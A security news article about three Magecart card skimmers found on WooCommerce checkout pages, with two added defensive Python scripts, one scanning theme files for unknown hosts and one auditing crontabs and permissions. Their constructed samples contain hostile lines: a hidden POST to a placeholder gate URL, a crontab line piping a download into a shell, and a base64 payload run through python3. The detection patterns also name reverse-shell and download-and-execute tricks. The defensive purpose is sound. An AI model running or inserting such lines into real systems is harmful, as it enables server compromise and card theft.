The Christmas shopping season is approaching, and so are the Magecart attackers. Surprisingly, these attackers have been more aggressive than ever before, with an attack every 16 minutes.
The Magecart attackers have recently targeted merchants that use the WooCommerce WordPress plugin. This open-source plugin is easy to customise and accounts for 29% of the top one million websites that use e-commerce technology. Because of its growing popularity, the plugin has now become a Magecart target.
Actual Story
- Three additional skimmers targeting merchants utilizing the WooCommerce plugin have been discovered by RiskIQ researchers.
- WooTheme, Slect, and Gateway skimmers were designed to evade detection and allow attackers to steal customers’ banking information.
- In order to launch the skimming codes on the sites, hackers exploited vulnerabilities in third-party themes and tools integrated into WooCommerce pages.
More Information about the Skimmer
Magecart refers to attacks that steal payment card data by injecting malicious code into e-commerce sites and skimming online payment forms. The technique rose to notoriety when it was used against the Magento e-commerce platform.
The various skimming gangs operating around the world, however, target practically every web environment and payment platform, including dozens of other online shopping platforms, particularly popular free and low-cost ones. WooCommerce is one of these plugins.
In late 2021, Magecart focused on WooCommerce, an open-source WordPress plugin that is extensively used by online shops. Researchers from RiskIQ discovered three distinct kinds of skimmer on WooCommerce checkout pages.
The WooTheme Skimmer
The first Magecart skimmer was discovered by RiskIQ across five domains using a compromised WooCommerce theme. The WooTheme skimmer is a relatively simple skimmer, which makes its functions straightforward to understand.
With the exception of one instance, the operators obfuscated the skimming code. RiskIQ had, however, observed the obfuscated skimmer on the same compromised domain before the clear-text version appeared, suggesting that the clear-text copy was a mistake.
The same skimmer was identified in July 2021 by the researcher unmaskparasites, who reported comparable findings: an exfiltration domain inside the theme’s functions.php and the same destination inside the query.slim.js file.
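The WooTheme finding above came down to an unexpected exfiltration host appearing inside theme files. The following is an added example of a defender-side baseline check, not RiskIQ’s tooling and not the skimmer’s code: it lists every external host referenced by a theme’s PHP and JS files, decodes simple hex escapes first so a hidden `\x2f\x2f` prefix is still seen, and reports any host not on an allowlist. The theme contents, the allowlist and the `cdn-static.invalid` host are constructed placeholders, not real indicators.

```python
"""Scan WordPress theme files for references to unexpected external hosts.

Added example (not RiskIQ's tooling or the skimmer's code): list every
external host a theme references and flag those not on an allowlist of
hosts the site is known to use.
"""
import re
from urllib.parse import urlparse

# Hosts the site legitimately talks to (constructed allowlist; a real
# deployment would build this from the theme's documented dependencies).
ALLOWED_HOSTS = {
    "fonts.googleapis.com",
    "code.jquery.com",
    "shop.example",  # the store's own domain (placeholder)
}

# Matches http(s) URLs and protocol-relative //host/... references, which
# skimmers commonly use so the script works on both http and https pages.
URL_RE = re.compile(r"""(?:https?:)?//[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'"<>)]*)?""")


def _decode_escapes(text: str) -> str:
    """Crude hex/unicode-escape decoder so hosts hidden as "\\x2f\\x2fhost" are still seen."""
    text = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return text


def external_hosts(source: str) -> set[str]:
    """Return the set of lower-cased hostnames referenced by a source file."""
    hosts = set()
    for match in URL_RE.finditer(_decode_escapes(source)):
        url = match.group(0)
        if url.startswith("//"):
            url = "https:" + url
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def find_unexpected_hosts(files: dict[str, str], allowed=ALLOWED_HOSTS) -> dict[str, list[str]]:
    """Return {filename: sorted unexpected hosts} for files referencing hosts outside the allowlist."""
    findings = {}
    for name, source in files.items():
        unexpected = external_hosts(source) - set(allowed)
        if unexpected:
            findings[name] = sorted(unexpected)
    return findings


# Constructed theme files. The host below is a placeholder, not a real IoC.
SAMPLE_THEME = {
    "functions.php": """<?php
function theme_enqueue() {
    wp_enqueue_style('fonts', 'https://fonts.googleapis.com/css?family=Roboto');
    wp_enqueue_script('slim', get_template_directory_uri() . '/js/query.slim.js');
}
add_action('wp_enqueue_scripts', 'theme_enqueue');
// injected: destination hidden behind hex escapes (placeholder host)
$gate = "\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2fcdn-static.invalid/gate.php";
""",
    "js/query.slim.js": """/* legitimate jquery-like code trimmed */
var s='https://code.jquery.com/jquery-3.6.0.slim.min.js';
document.addEventListener('DOMContentLoaded',function(){fetch('//cdn-static.invalid/gate.php',{method:'POST'});});
""",
    "style.css": "/* Theme Name: Example */ body { margin: 0; }",
}

if __name__ == "__main__":
    for name, hosts in find_unexpected_hosts(SAMPLE_THEME).items():
        print(f"{name}: unexpected hosts {hosts}")
```

Run against a real theme directory, the same function would take the files read from disk; keeping the allowlist small and explicit is what makes a newly injected exfiltration host stand out.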
The Slect Skimmer
Generic skimmers are in high demand and relatively easy to come by.
They are frequently used over the same infrastructure, even by different threat actors who customise the skimmer to meet their own requirements.
Detecting slight changes in skimmers, on the other hand, helps analysts determine the patterns that indicate whether Magecart activity is new.
The ‘Slect’ skimmer was named after what appears to be a typo of the word “select” in the script, which marked it out as a never-before-seen skimmer.
The Slect skimmer does two interesting things once the DOM content is fully loaded.
It looks for open text fields, password fields and checkboxes, as well as other form fields from which the skimmer does not want to capture data.
Then, to avoid sandboxing by security researchers, an event listener waits for a button click before acting.
To avoid detection on infected sites, the Slect skimmer relies on a typo of the word ‘select’ in the script.
The skimmer’s exfiltration domain has already been linked to other Magecart infrastructure, and RiskIQ researcher Jordan Herman recognised it as one used by a variant of the Grelos skimmer.
The Gateway Skimmer
The actor layered this last skimmer with several stages to disguise and obfuscate its operations.
The skimmer code, though obfuscated, is large and difficult to decipher, and it performs a few operations that are not found in other skimmers.
The words “gate” and “gateway” in the .php and .js files let RiskIQ identify this skimmer as unique and name it “Gateway.”
The WooTheme skimmer code was identified on five domains using a compromised WooCommerce theme, first reported in July.
On one website, the skimmer code appeared in the compromised domain’s ‘error’ area.
Once the malicious code has been injected, it searches the form for open text fields, passwords and checkboxes.
The Gateway skimmer uses multiple layers of obfuscation, making it difficult for security researchers to detect.
To avoid detection, it uses the words ‘gate’ and ‘gateway’ in its PHP and JavaScript scripts.
According to the researchers, the WooCommerce version of the Gateway skimmer checks for the Firebug browser extension, which was discontinued in 2017.
After peeling back the obfuscation around the legitimate code, RiskIQ researchers found a skimmer they had been monitoring since 2019.
This skimmer also sends PII and credit card information to the same C2 domain as the previous skimmer.
How can you protect your company?
The newly discovered skimmers demonstrate how threat actors keep inventing new ways to gain access to, deploy and hide their tools on victim websites. Merchants must therefore improve their preparedness for credit card skimming attacks. Beyond that, effective malware detection and periodic examination of crontab entries for unusual contents can help limit the risk of such attacks.
RiskIQ’s identification of credit card skimmers and Magecart activity is still evolving, and the company’s knowledge base on these types of attack is growing. A surge in e-commerce targeting puts merchants and online shoppers at risk, especially during the holiday season.
Small and medium-sized enterprises, often regarded as the most vulnerable, are frequent WooCommerce users, as they lack the means to invest in complex and thoroughly vetted third-party technologies. As we have seen over the years, Magecart skimming can affect both small and large retailers.
RiskIQ’s detections of skimmers and other malware show that threat actors gain access to, deploy and hide their tools on victim websites in a variety of ways. Beyond comprehensive malware detection, website operators should regularly check their crontab entries for unusual contents, ensure that access permissions are correct, and audit file access.
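The closing advice above is to check crontab entries for unusual contents, verify access permissions and audit file access. As an added example of how an operator might script those checks (not RiskIQ’s tooling), the block below applies a small set of heuristics to a constructed crontab and a constructed file listing: a download piped into a shell, a base64-decoded payload, a world-writable theme file, or a PHP file inside the uploads directory. The pattern list and the sample hosts and paths are assumptions for illustration, not a definitive rule set or real indicators.

```python
"""Audit crontab entries and wp-content permissions for signs of tampering.

Added example, not RiskIQ's tooling. Heuristics are assumptions chosen
for illustration; extend them to match the host's own baseline.
"""
import re
import stat

# Command fragments that are rarely legitimate in a web server's crontab.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"), "download piped into a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64-decoded payload"),
    (re.compile(r"\beval\b"), "eval of dynamic content"),
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"/tmp/[^\s]+\.(sh|php|py)\b"), "script executed from /tmp"),
    (re.compile(r"wp-content/(themes|plugins)/[^\s]*\.php"), "cron directly invoking a theme or plugin PHP file"),
]


def audit_crontab(text: str):
    """Return [(line_no, reason, line)] for crontab lines matching a suspicious pattern."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if stripped.startswith("@"):
            # @hourly / @reboot style entries: one keyword, then the command.
            parts = stripped.split(None, 1)
            command = parts[1] if len(parts) > 1 else ""
        else:
            # Standard entries: five schedule fields, then the command.
            parts = stripped.split(None, 5)
            command = parts[5] if len(parts) > 5 else ""
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(command):
                findings.append((no, reason, stripped))
                break
    return findings


def audit_permissions(listing):
    """listing: iterable of (path, mode) as os.stat().st_mode would give.

    Flags world-writable entries and PHP files inside the uploads directory,
    neither of which a WordPress site normally needs."""
    findings = []
    for path, mode in listing:
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        if "/wp-content/uploads/" in path and path.endswith(".php"):
            findings.append((path, "PHP file inside uploads directory"))
    return findings


# Constructed crontab for a WordPress host (hosts are placeholders, not IoCs).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
*/5 * * * * /usr/bin/php /var/www/html/wp-cron.php >/dev/null 2>&1
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s http://cdn-static.invalid/u.txt | sh
@hourly echo aW1wb3J0IG9zCg== | base64 -d | python3
30 2 * * 0 /usr/bin/mysqldump --single-transaction shop > /backup/shop.sql
"""

# Constructed file listing: (path, st_mode).
SAMPLE_LISTING = [
    ("/var/www/html/wp-config.php", stat.S_IFREG | 0o640),
    ("/var/www/html/wp-content/themes/shop/functions.php", stat.S_IFREG | 0o666),
    ("/var/www/html/wp-content/uploads/2021/11/gate.php", stat.S_IFREG | 0o644),
    ("/var/www/html/wp-content/uploads/2021/11/hero.jpg", stat.S_IFREG | 0o644),
]

if __name__ == "__main__":
    for no, reason, line in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {no}: {reason}: {line}")
    for path, reason in audit_permissions(SAMPLE_LISTING):
        print(f"{path}: {reason}")
```

On a live host the crontab text would come from `crontab -l` for each account that can run jobs, and the listing from walking `wp-content` with `os.stat`; running the audit from cron itself and diffing its output against the previous run turns a one-off check into the periodic review the article recommends.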